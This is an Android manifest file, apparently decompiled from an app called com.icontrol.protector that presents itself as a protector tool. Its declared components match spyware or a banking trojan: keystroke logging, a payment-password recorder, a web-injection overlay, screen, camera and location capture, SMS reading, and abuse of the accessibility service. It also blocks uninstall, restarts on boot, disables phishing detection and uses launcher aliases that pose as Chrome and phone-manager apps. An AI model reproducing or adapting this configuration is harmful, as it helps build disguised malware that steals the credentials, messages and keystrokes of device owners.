<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" xmlns:cnamspace="http://cnamevalue" android:compileSdkVersion="34" android:compileSdkVersionCodename="14" package="com.icontrol.protector" platformBuildVersionCode="34" platformBuildVersionName="14">
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true" android:xlargeScreens="true"/>
    <uses-feature android:name="android.hardware.bluetooth" android:required="false"/>
    <uses-feature android:name="android.hardware.location" android:required="false"/>
    <uses-feature android:name="android.hardware.location.network" android:required="false"/>
    <uses-feature android:name="android.hardware.location.gps" android:required="false"/>
    <uses-feature android:name="android.hardware.camera" android:required="false"/>
    <uses-feature android:name="android.hardware.nfc" android:required="false"/>
    <uses-feature android:name="android.hardware.wifi" android:required="false"/>
    <uses-feature android:name="android.hardware.telephony" android:required="false"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_SPECIAL_USE"/>
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM"/>
    <uses-permission android:name="android.permission.USE_EXACT_ALARM"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="android.permission.REQUEST_DELETE_PACKAGES"/>
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS"/>
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
    <uses-permission android:maxSdkVersion="32" android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:maxSdkVersion="32" android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <queries>
        <intent>
            <action android:name="android.intent.action.MAIN"/>
        </intent>
        <intent>
            <action android:name="android.intent.action.VIEW"/>
        </intent>
        <intent>
            <action android:name="android.intent.action.PICK"/>
        </intent>
        <intent>
            <action android:name="android.intent.action.DIAL"/>
        </intent>
        <intent>
            <action android:name="android.intent.action.CALL"/>
        </intent>
        <intent>
            <action android:name="android.intent.action.WEB_SEARCH"/>
        </intent>
        <intent>
            <action android:name="android.settings.SETTINGS"/>
        </intent>
    </queries>
    <uses-feature android:name="android.hardware.camera.autofocus"/>
    <permission android:name="com.icontrol.protector.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" android:protectionLevel="signature"/>
    <uses-permission android:name="com.icontrol.protector.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:extractNativeLibs="false" android:icon="@drawable/mylogo" android:label="@string/BaseName" android:largeHeap="true" android:networkSecurityConfig="@xml/network_security_config" android:supportsRtl="true" android:theme="@android:style/Theme.NoTitleBar" android:usesCleartextTraffic="true">
        <uses-library android:name="org.apache.http.legacy" android:required="false"/>
        <provider android:authorities="com.icontrol.protector.provider" android:exported="false" android:grantUriPermissions="false" android:name="androidx.core.content.FileProvider">
            <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/fileprovider1"/>
            <grant-uri-permission android:pathPrefix="/"/>
        </provider>
        <activity android:enabled="true" android:exported="true" android:name="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.Black.NoTitleBar"/>
        <activity-alias android:enabled="false" android:exported="true" android:icon="@drawable/chrome" android:label="Chrome " android:name="com.icontrol.protector.ChromeLauncherAlias" android:targetActivity="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:enabled="false" android:exported="true" android:icon="@drawable/vivo" android:label="i管家" android:name="com.icontrol.protector.VivoLauncherAlias" android:targetActivity="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:enabled="false" android:exported="true" android:icon="@drawable/oppo" android:label="手机管家" android:name="com.icontrol.protector.OppoLauncherAlias" android:targetActivity="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:enabled="false" android:exported="true" android:icon="@drawable/icon_sim" android:label="sim" android:name="com.icontrol.protector.SIMLauncherAlias" android:targetActivity="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:enabled="false" android:exported="true" android:icon="@drawable/icon" android:label="@string/app_name1" android:name="com.icontrol.protector.TransparentLauncherAlias" android:targetActivity="com.icontrol.protector.ActivMain" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity-alias android:enabled="true" android:exported="true" android:icon="@drawable/mylogo" android:label="@string/BaseName" android:name="com.icontrol.protector.A1" android:targetActivity="com.icontrol.protector.ActivMain">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.MuteActivity" android:noHistory="true"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:launchMode="singleTask" android:name="com.icontrol.protector.AlertActivity" android:noHistory="true" android:taskAffinity="" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.BrodcastActivity" android:noHistory="true" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:label="View" android:launchMode="singleTask" android:name="com.icontrol.protector.Webjector" android:noHistory="true" android:taskAffinity="" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.RecordPayPassWord" android:noHistory="true" android:theme="@style/Theme.AppCompat.Light.NoActionBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.MuteUninstall" android:noHistory="true" android:theme="@style/Theme.AppCompat.Light.NoActionBar"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.PermissionsActivity"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.AccessibilityActivity" android:noHistory="true" android:theme="@style/AppThemeDemo"/>
        <activity android:excludeFromRecents="true" android:exported="true" android:name="com.icontrol.protector.ActivityCaptureScreen" android:noHistory="true"/>
        <activity android:enabled="true" android:excludeFromRecents="true" android:exported="true" android:hardwareAccelerated="false" android:icon="@drawable/icon" android:label="@string/app_name1" android:launchMode="singleTask" android:name="com.icontrol.protector.LockActivity" android:noHistory="true" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.WorkServices" android:persistent="true" android:stopWithTask="false"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.LocationMonitor"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.CameraCap"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.LiveKeysStrok"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.LiveChat" android:persistent="true" android:stopWithTask="false"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.EngineWorker" android:persistent="true" android:stopWithTask="false"/>
        <service android:enabled="true" android:exported="true" android:name="com.icontrol.protector.MyJobService" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:enabled="true" android:exported="true" android:foregroundServiceType="mediaProjection" android:name="com.icontrol.protector.ScreenCaps"/>
        <service android:exported="true" android:foregroundServiceType="specialUse" android:name="com.icontrol.protector.AccessServices" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:persistent="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/accessibilityprivatesrcapp"/>
        </service>
        <receiver android:enabled="true" android:exported="true" android:name="com.icontrol.protector.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="com.htc.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.REBOOT"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:enabled="true" android:exported="true" android:name="com.icontrol.protector.ResetServices">
            <intent-filter>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
                <action android:name="android.intent.action.BATTERY_LOW"/>
                <action android:name="android.intent.action.BATTERY_OKAY"/>
                <action android:name="android.intent.action.LOCALE_CHANGED"/>
                <action android:name="android.intent.action.TIMEZONE_CHANGED"/>
                <action android:name="android.intent.action.TIME_TICK"/>
                <action android:name="android.intent.action.DEVICE_STORAGE_LOW"/>
                <action android:name="android.intent.action.DEVICE_STORAGE_OK"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <activity android:enabled="true" android:exported="true" android:name="com.icontrol.protector.TransparentActivity" android:showOnLockScreen="true" android:showWhenLocked="true" android:theme="@android:style/Theme.Translucent.NoTitleBar" android:turnScreenOn="true"/>
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|uiMode|screenSize|smallestScreenSize" android:enabled="false" android:excludeFromRecents="false" android:exported="true" android:hardwareAccelerated="true" android:icon="@drawable/icon" android:label="@string/app_name1" android:name="com.icontrol.protector.HiddenActivity" android:noHistory="true" android:roundIcon="@drawable/icon" android:screenOrientation="sensor" android:theme="@android:style/Theme.Translucent.NoTitleBar">
            <intent-filter>
                <action android:name="android.intent.action.CHOOSER"/>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.INFO"/>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="com.android.internal.category.PLATLOGO"/>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SEND_MULTIPLE"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_CHANGED"/>
                <action android:name="com.ui.OnAlarmReceiver.ACTION_WIDGET_RECEIVER"/>
                <action android:name="com.android.vending.billing.InAppBillingService.COIN"/>
                <action android:name="com.android.vending.billing.InAppBillingService.COIO"/>
                <action android:name="com.android.vending.billing.InAppBillingService.LUCM"/>
                <action android:name="com.android.vending.billing.InAppBillingService.PROX"/>
                <action android:name="ir.cafebazaar.pardakht.InAppBillingService.BIND"/>
                <action android:name="ru.aaaaaaax.installer"/>
                <action android:name="com.nokia.payment.iapenabler.InAppBillingService.BIND"/>
                <action android:name="com.android.vending.billing.InAppBillingService.INST"/>
            </intent-filter>
        </activity>
        <meta-data android:name="com.google.android.gms.version" android:value="12451000"/>
        <meta-data android:name="com.google.android.ALLOW_PHISHING_DETECTION" android:value="false"/>
        <meta-data android:name="com.sec.android.support.multiwindow" android:value="true"/>
        <meta-data android:name="com.sec.android.multiwindow.DEFAULT_SIZE_W" android:value="632.0dip"/>
        <meta-data android:name="com.sec.android.multiwindow.DEFAULT_SIZE_H" android:value="598.0dip"/>
        <meta-data android:name="com.sec.android.multiwindow.MINIMUM_SIZE_W" android:value="632.0dip"/>
        <meta-data android:name="com.sec.android.multiwindow.MINIMUM_SIZE_H" android:value="598.0dip"/>
        <meta-data android:name="com.android.dynamic.apk.fused.modules" android:value="base"/>
        <meta-data android:name="com.android.stamp.type" android:value="STAMP_TYPE_DISTRIBUTION_APK"/>
        <meta-data android:name="com.android.stamp.source" android:value="https://play.google.com/store"/>
        <meta-data android:name="com.android.vending.derived.apk.id" android:value="3"/>
        <provider android:authorities="com.icontrol.protector.androidx-startup" android:exported="false" android:name="androidx.startup.InitializationProvider">
            <meta-data android:name="androidx.work.WorkManagerInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup"/>
        </provider>
        <service android:directBootAware="false" android:enabled="@bool/enable_system_alarm_service_default" android:exported="false" android:name="androidx.work.impl.background.systemalarm.SystemAlarmService"/>
        <service android:directBootAware="false" android:enabled="@bool/enable_system_job_service_default" android:exported="true" android:name="androidx.work.impl.background.systemjob.SystemJobService" android:permission="android.permission.BIND_JOB_SERVICE"/>
        <service android:directBootAware="false" android:enabled="@bool/enable_system_foreground_service_default" android:exported="false" android:name="androidx.work.impl.foreground.SystemForegroundService"/>
        <receiver android:directBootAware="false" android:enabled="true" android:exported="false" android:name="androidx.work.impl.utils.ForceStopRunnable$BroadcastReceiver"/>
        <receiver android:directBootAware="false" android:enabled="false" android:exported="false" android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryChargingProxy">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="false" android:exported="false" android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$BatteryNotLowProxy">
            <intent-filter>
                <action android:name="android.intent.action.BATTERY_OKAY"/>
                <action android:name="android.intent.action.BATTERY_LOW"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="false" android:exported="false" android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$StorageNotLowProxy">
            <intent-filter>
                <action android:name="android.intent.action.DEVICE_STORAGE_LOW"/>
                <action android:name="android.intent.action.DEVICE_STORAGE_OK"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="false" android:exported="false" android:name="androidx.work.impl.background.systemalarm.ConstraintProxy$NetworkStateProxy">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="false" android:exported="false" android:name="androidx.work.impl.background.systemalarm.RescheduleReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.TIME_SET"/>
                <action android:name="android.intent.action.TIMEZONE_CHANGED"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="@bool/enable_system_alarm_service_default" android:exported="false" android:name="androidx.work.impl.background.systemalarm.ConstraintProxyUpdateReceiver">
            <intent-filter>
                <action android:name="androidx.work.impl.background.systemalarm.UpdateProxies"/>
            </intent-filter>
        </receiver>
        <receiver android:directBootAware="false" android:enabled="true" android:exported="true" android:name="androidx.work.impl.diagnostics.DiagnosticsReceiver" android:permission="android.permission.DUMP">
            <intent-filter>
                <action android:name="androidx.work.diagnostics.REQUEST_DIAGNOSTICS"/>
            </intent-filter>
        </receiver>
        <service android:directBootAware="true" android:exported="false" android:name="androidx.room.MultiInstanceInvalidationService"/>
    </application>
</manifest>
